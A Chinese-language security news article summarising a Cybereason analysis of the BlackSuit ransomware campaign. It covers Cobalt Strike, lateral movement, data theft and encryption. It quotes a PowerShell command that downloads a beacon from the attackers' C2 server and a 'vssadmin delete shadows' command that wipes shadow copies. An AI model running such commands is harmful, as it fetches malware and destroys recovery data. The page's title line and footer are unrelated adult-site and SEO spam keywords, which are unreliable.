成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

BlackSuit:Royal/Conti改頭換面重出江湖,新型勒索軟件以速度、隱蔽性和數據竊取為特征

安全
與傳統僅關注加密的勒索攻擊不同,BlackSuit采用三階段殺傷鏈:初始入侵、數據竊取和選擇性加密,并輔以數據刪除手段破壞恢復工作。

高度協同的破壞性勒索活動

Cybereason最新調查揭露,BlackSuit勒索軟件組織(臭名昭著的Royal和Conti威脅組織的重組后繼者)正在實施一場高度協同的破壞性勒索活動。該活動融合了隱蔽性、速度和精準打擊能力,堪稱今年最復雜的勒索軟件攻擊之一。

Cybereason在報告中指出:"BlackSuit是2023年年中出現的勒索軟件組織,被廣泛認為是Royal勒索團伙的改頭換面或分支。"

三重殺傷鏈攻擊模式

與傳統僅關注加密的勒索攻擊不同,BlackSuit采用三階段殺傷鏈:初始入侵、數據竊取和選擇性加密,并輔以數據刪除手段破壞恢復工作。

攻擊始于部署Cobalt Strike信標實現命令控制(C2)和橫向移動。雖然初始入侵途徑尚不明確,但分析人員注意到早期流量來自未安裝Cybereason傳感器的設備,表明系統早已被攻陷。

研究團隊強調:"Cobalt Strike被確認為BlackSuit勒索軟件的主要攻擊工具。"

橫向移動技術組合

BlackSuit采用多種技術實現橫向移動:

  • 通過PsExec.exe在C:\Windows\Temp目錄分發執行vm.dll和vm80.dll等載荷
  • 創建具有System權限的RPC服務
  • 使用Configure-SMRemoting.exe建立遠程桌面連接
  • 從網絡共享執行frdke23.exe等可疑二進制文件,通過rundll32.exe將代碼注入wuauclt.exe等合法進程

這些技術使攻擊者能在全網進行廣泛偵察和載荷部署的同時保持隱蔽性。

載荷投遞與執行特征

攻擊者使用如下PowerShell命令下載Cobalt Strike信標:

invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm.dll

同一C2基礎設施被用于投遞最終載荷——通過重命名為b.exe和vmware.dll等文件部署BlackSuit勒索軟件。一個異常特征是執行時使用了-nomutex標志:

"與典型勒索行為不同...-nomutex標志禁用互斥體創建...允許并發多實例執行——可能是為了實現冗余、加速跨會話加密或規避基于互斥體的檢測。"

雙重勒索與破壞恢復

加密前,攻擊者使用偽裝成vmware.exe的rclone.exe竊取約60GB敏感數據。這反映了雙重勒索策略的流行趨勢——通過預先竊取數據增加贖金壓力。

為破壞系統恢復,攻擊者使用vssadmin.exe刪除卷影副本:

vssadmin delete shadows /all /quiet

隨后立即執行勒索軟件,僅針對特定文件類型加密,同時排除Windows、IPC$和ADMIN$等系統關鍵文件夾以避免業務中斷。

精心設計的加密邏輯

BlackSuit的加密邏輯針對性能和隱蔽性進行了優化,避免加密.exe、.dll和.BlackSuit文件,并投放勒索說明。

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2021-09-14 14:55:17

REvil勒索軟件網絡攻擊

2020-10-21 10:41:06

DDOS安全Web

2022-07-25 20:45:23

惡意軟件Amadey Bot漏洞

2021-12-29 14:04:14

惡意軟件黑客網絡攻擊

2013-07-10 09:57:12

希捷固態硬盤主控

2012-05-30 09:37:18

Windows PCUbuntu

2014-07-14 09:46:33

2021-09-29 15:33:42

Jupyter病毒MSI

2025-06-17 07:50:00

惡意軟件網絡安全終端安全

2021-03-29 10:44:20

惡意軟FIN8團伙網絡金融犯罪

2011-07-19 13:09:51

2018-07-30 12:04:33

2020-08-14 11:36:30

惡意軟件漏洞Emotet

2023-09-22 07:46:22

SLCSSD存儲

2010-08-03 11:28:10

四網合一電力線上網

2025-01-10 12:33:39

2019-01-27 14:57:18

微信支付分騰訊信用

2018-02-24 09:00:52

算法攻擊欺詐

2014-12-26 14:35:34

2020-06-30 14:55:43

飛信WiFi運營商
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 日本免费在线视频 | 国产黄a三级三级三级看三级男男 | 日本丰满少妇裸体自慰 | 久久激情网 | 亚洲精品乱码久久久久久蜜桃91 | 性色av浪潮av | www.久久久久久 | 麻豆国产91在线播放 | 欧美性猛交xxxx黑人交 | 一区二区三区四区在线播放 | 成人欧美一区二区三区黑人孕妇 | 日韩av在线免费看 | 懂色av成人一区二区三区 | 日韩黄色在线观看 | 一级黄色网| 国产这里只有精品 | 久草网在线 | 免费一级黄色片 | 日韩毛片网站 | 久久精品一二三 | 九九天堂 | 国产精品视频久久 | 欧美片网站免费 | 久热精品视频在线观看 | 黄色片视频网站 | 国产成人av在线 | av狠狠干 | 91精选视频 | 三年中文在线观看免费大全中国 | av资源在线播放 | 欧美一级全黄 | 中文字幕不卡在线观看 | 日韩免费精品视频 | 蜜乳av懂色av粉嫩av | 色婷婷在线播放 | 欧美日韩免费 | 一区二区三区不卡视频 | 国产免费网址 | 国产成人三级一区二区在线观看一 | 狠狠干影院 | 久久成人一区 |